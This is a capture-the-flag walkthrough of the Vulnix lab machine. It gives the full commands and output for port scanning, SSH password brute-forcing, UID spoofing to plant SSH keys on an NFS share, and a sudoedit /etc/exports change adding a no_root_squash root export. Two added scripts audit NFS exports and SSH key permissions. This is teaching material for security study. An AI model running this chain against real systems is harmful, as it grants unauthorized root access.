Vulnix
Target IP: 192.168.1.135
Kali IP: 192.168.1.128
Information gathering
sudo nmap --min-rate 10000 -p- 192.168.1.135
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 10:13 CST
Nmap scan report for bogon (192.168.1.135)
Host is up (0.0018s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
79/tcp open finger
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
512/tcp open exec
513/tcp open login
514/tcp open shell
993/tcp open imaps
995/tcp open pop3s
2049/tcp open nfs
35745/tcp open unknown
44010/tcp open unknown
50309/tcp open unknown
55641/tcp open unknown
59567/tcp open unknown
sudo nmap -sT -sV -O -p- 192.168.1.135
Not shown: 65518 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
79/tcp open finger Linux fingerd
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
143/tcp open imap Dovecot imapd
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open shell?
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3s?
2049/tcp open nfs 2-4 (RPC #100003)
35745/tcp open mountd 1-3 (RPC #100005)
44010/tcp open nlockmgr 1-4 (RPC #100021)
50309/tcp open mountd 1-3 (RPC #100005)
55641/tcp open mountd 1-3 (RPC #100005)
59567/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:5E:A3:8D (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Points of interest:
smtp (25)
Simple Mail Transfer Protocol service; usually paired with pop3 (110) and imap (143). Weak passwords may be brute-forceable.
finger (79)
Used to query information about a host or its users.
rpcbind (111)
Remote procedure calls; put simply, one node requests a service offered by another node. Can be enumerated.
rsh (512/513/514)
Linux remote login; requires a password, so brute-forcing may be possible.
rpcinfo -p 192.168.1.135
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 53781 status
100024 1 tcp 59567 status
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 2 tcp 2049 nfs_acl
100227 3 tcp 2049 nfs_acl
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100227 2 udp 2049 nfs_acl
100227 3 udp 2049 nfs_acl
100021 1 udp 42327 nlockmgr
100021 3 udp 42327 nlockmgr
100021 4 udp 42327 nlockmgr
100021 1 tcp 44010 nlockmgr
100021 3 tcp 44010 nlockmgr
100021 4 tcp 44010 nlockmgr
100005 1 udp 38329 mountd
100005 1 tcp 35745 mountd
100005 2 udp 42275 mountd
100005 2 tcp 55641 mountd
100005 3 udp 45218 mountd
100005 3 tcp 50309 mountd
nfs listens on port 2049 over both tcp and udp.
showmount -e 192.168.1.135
Export list for 192.168.1.135:
/home/vulnix *
This means the share can be accessed from any host, so mount it on the local machine.
Opening it gives a permission denied error; root_squash is probably set.
no_root_squash: if the user logging in to the NFS host to use the shared directory is root, they keep root privileges on that shared directory. This option is extremely unsafe and not recommended.
root_squash: if the user logging in to the NFS host to use the shared directory is root, their privileges are squashed to those of an anonymous user; typically the UID and GID become those of the system account nobody.
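To make the two export settings concrete, here is an added audit script (not code from the original walkthrough) that parses a file in /etc/exports syntax and flags exports open to every host, exports with no_root_squash, and world-writable exports. The sample file is constructed for this demo; its first two lines are the share found with showmount and the line the walkthrough later adds, the third is a harmless control entry.

```shell
#!/bin/sh
# Added example (not code from the original walkthrough): audit an NFS exports
# file for the weaknesses this box relies on. The sample file is constructed.

audit_exports() {
    # $1: path to a file in /etc/exports syntax. Prints one line per finding.
    sed 's/#.*//' "$1" | awk 'NF > 0 {
        path = $1
        for (i = 2; i <= NF; i++) {
            spec = $i; client = spec; opts = ""
            p = index(spec, "(")
            if (p > 0) {
                client = substr(spec, 1, p - 1)
                opts = substr(spec, p + 1, length(spec) - p - 1)
            }
            # "*" (or an empty client before the parentheses) exports to every host
            world = (client == "*" || client == "")
            if (world)
                printf "WORLD-READABLE %s is exported to every host\n", path
            if (index("," opts ",", ",no_root_squash,") > 0)
                printf "NO_ROOT_SQUASH %s %s: remote uid 0 keeps root on this export\n", path, client
            if (world && index("," opts ",", ",rw,") > 0)
                printf "WORLD-WRITABLE %s: any host can write\n", path
        }
    }'
}

sample_exports() {
    # Writes the constructed sample and prints its path.
    f=${TMPDIR:-/tmp}/exports.sample.$$
    cat > "$f" <<'EOF'
# share found with showmount, the line added later via sudoedit, and a safe control entry
/home/vulnix *
/root *(rw,no_root_squash)
/srv/backup 192.168.1.128(rw,sync)
EOF
    echo "$f"
}

audit_exports "$(sample_exports)"
```

Only the two wildcard entries produce findings; the host-restricted control line is silent.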
Enumerating smtp users turned up the root, user and vulnix accounts; with hydra only the password for user could be cracked.
ACCOUNT FOUND: [ssh] Host: 192.168.1.135 User: user Password: letmein [SUCCESS]
user:letmein
user@vulnix:~$ ls
user@vulnix:~$ whoami
user
user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
No usable data; out of ideas.
Checked a writeup; the approach is:
- Mount the target's /home/vulnix directory locally at /tmp/vulnix via nfs
- Switch to a vulnix user on Kali
- Copy the current user's ssh public key to the /tmp directory
- Copy the ssh public key into the authorized_keys file in the remote directory
- Log in to the target's vulnix account over ssh without a password
- Then proceed with privilege escalation
On Linux every user has a unique user ID (uid). During ssh login the server checks that the uid of the connecting user matches the uid that owns the authorized_keys file; if they differ, the ssh login fails. So the vulnix user on Kali must have the same UID as on the target.
Check the uid of the vulnix user:
user@vulnix:~$ cat /etc/passwd |grep bash
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
On Kali create the user vulnix, then set its password and UID.
useradd -m vulnix
passwd vulnix
新的密码:
重新输入新的密码:
passwd:已成功更新密码
leafpad /etc/passwd
vulnix:x:2008:2008::/home/vulnix:/bin/bash
Note: -m creates the user's home directory.
Mount
mount -t nfs 192.168.1.135:/home/vulnix /tmp/mount/
Switch user
su vulnix
$ bash
Generate a key pair
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa):
Created directory '/home/vulnix/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/vulnix/.ssh/id_rsa
Your public key has been saved in /home/vulnix/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:2oDhnxJHWud5qTfFGW6m6w8pPEHo218RGPpYtkygZGs vulnix@kali
The key's randomart image is:
+---[RSA 3072]----+
| o . . |
| o + o o |
| . E + = o |
| . O + O = + |
| = + S * O |
| + O + * . |
| . = B * . |
| . = = |
| .+.. |
+----[SHA256]-----+
Note: id_rsa is the private key, id_rsa.pub the public key; the public key has to go into the locally mounted directory.
cp ~/.ssh/id_rsa.pub /tmp/mount/.ssh/authorized_keys
or
cat ~/.ssh/id_rsa.pub >/tmp/mount/.ssh/authorized_keys
ssh connection
ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa vulnix@192.168.1.135 -v
Notes:
-i specifies the private key file;
Also, current Linux ssh no longer accepts ssh-dss (reportedly insecure, so changing this in ssh_config is not advised), hence the temporary -o option.
Pay attention to the permissions of the key files (~/.ssh/id_rsa and /tmp/mount/.ssh/authorized_keys). (I had set them to 777 and could not get in; stuck on that for a day ╮(~ ̄▽ ̄)╭ )
Reference (the linked passage says: first set the .ssh directory to 700, then set authorized_keys to 600): https://blog.csdn.net/u010694718/article/details/104804066#::text=%E9%A6%96%E5%85%88%E8%AE%BE%E7%BD%AE%2F.ssh%E7%9B%AE%E5%BD%95%E6%9D%83%E9%99%90%E4%B8%BA700%EF%BC%8C%E7%84%B6%E5%90%8E%E8%AE%BE%E7%BD%AEauthorized_keys%E6%9D%83%E9%99%90%E4%B8%BA600%E3%80%82%20cd%20%20chmod%20700%20%2F.ssh,cd%20~%2F.ssh%20chmod%20600%20authorized_keys%201
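The day lost to 777 permissions above is a StrictModes rejection. The following added script (not from the original walkthrough) applies the same ownership and write-bit checks that sshd and the ssh client make, so the cause shows up immediately; it assumes GNU stat with -c, and the demo directory it builds is a scratch copy of the bad-then-fixed setup.

```shell
#!/bin/sh
# Added example (not code from the original walkthrough): apply the checks that
# sshd (StrictModes yes) and the ssh client make on key files, so a failing
# key login is diagnosed rather than guessed at. Assumes GNU stat (-c).
# Prints one line per problem; returns 0 when all files are acceptable.

check_ssh_perms() {
    # $1: the .ssh directory to inspect; $2: the user who must own it
    dir=$1; owner=$2; rc=0
    for f in "$dir" "$dir/authorized_keys" "$dir/id_rsa"; do
        [ -e "$f" ] || continue
        mode=$(stat -c '%a' "$f"); u=$(stat -c '%U' "$f")
        # sshd ignores ~/.ssh and authorized_keys unless owned by the user or root
        if [ "$u" != "$owner" ] && [ "$u" != root ]; then
            echo "BAD-OWNER $f is owned by $u, expected $owner"; rc=1
        fi
        case $f in
        */id_rsa)
            # the ssh client refuses a private key that others can read
            case $mode in
            600|400) ;;
            *) echo "PRIVATE-KEY-EXPOSED $f mode $mode, need 600"; rc=1 ;;
            esac ;;
        *)
            # group or other write bit set: digit 2, 3, 6 or 7 in the last two places
            last2=${mode#${mode%??}}
            case $last2 in
            *[2367]*) echo "WRITABLE-BY-OTHERS $f mode $mode (use 700 for .ssh, 600 for authorized_keys)"; rc=1 ;;
            esac ;;
        esac
    done
    return $rc
}

# Demo on a scratch directory: the 777 setting from the walkthrough, then the fix.
demo_dir=$(mktemp -d)
mkdir -m 777 "$demo_dir/.ssh"; : > "$demo_dir/.ssh/authorized_keys"; chmod 777 "$demo_dir/.ssh/authorized_keys"
check_ssh_perms "$demo_dir/.ssh" "$(id -un)" || echo "=> sshd would not accept this key"
chmod 700 "$demo_dir/.ssh"; chmod 600 "$demo_dir/.ssh/authorized_keys"
check_ssh_perms "$demo_dir/.ssh" "$(id -un)" && echo "=> permissions acceptable"
rm -rf "$demo_dir"
```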
vulnix@vulnix:~$ whoami
vulnix
Switched successfully; now on to privilege escalation.
vulnix@vulnix:/$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
Open /etc/exports and add the line /root *(rw,no_root_squash) so the target's /root directory is shared over nfs.
vulnix@vulnix:/etc$ sudoedit /etc/exports
sudoedit: /etc/exports unchanged
Reboot the target so the nfs configuration file is re-read.
On Kali create /tmp/v and mount the target's root directory there:
mount -t nfs 192.168.1.135:/root /tmp/v
Generate a new key pair, hand the public key to the target, then connect over ssh.
┌──(root㉿kali)-[~/.ssh]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:84l0+6YMhIOFm2J9Bm46edZUOd0At8Caug1dx6YwaAs root@kali
The key's randomart image is:
+---[RSA 3072]----+
| .o.o |
| . .= + |
| o..o+.o . |
| Eoo*=o..+ |
| ooB+*+S+. |
| . =+=.+.= o |
| + o+. o + |
| +. . o .. |
| oo. |
+----[SHA256]-----+
┌──(root㉿kali)-[~/.ssh]
└─# cp ~/.ssh/id_rsa.pub /tmp/v/.ssh/authorized_keys
┌──(root㉿kali)-[/tmp/v/.ssh]
└─# ssh -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' -i ~/.ssh/id_rsa root@192.168.1.135 -v
root@vulnix:~# whoami
root
root@vulnix:~# uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)
Privilege escalation successful.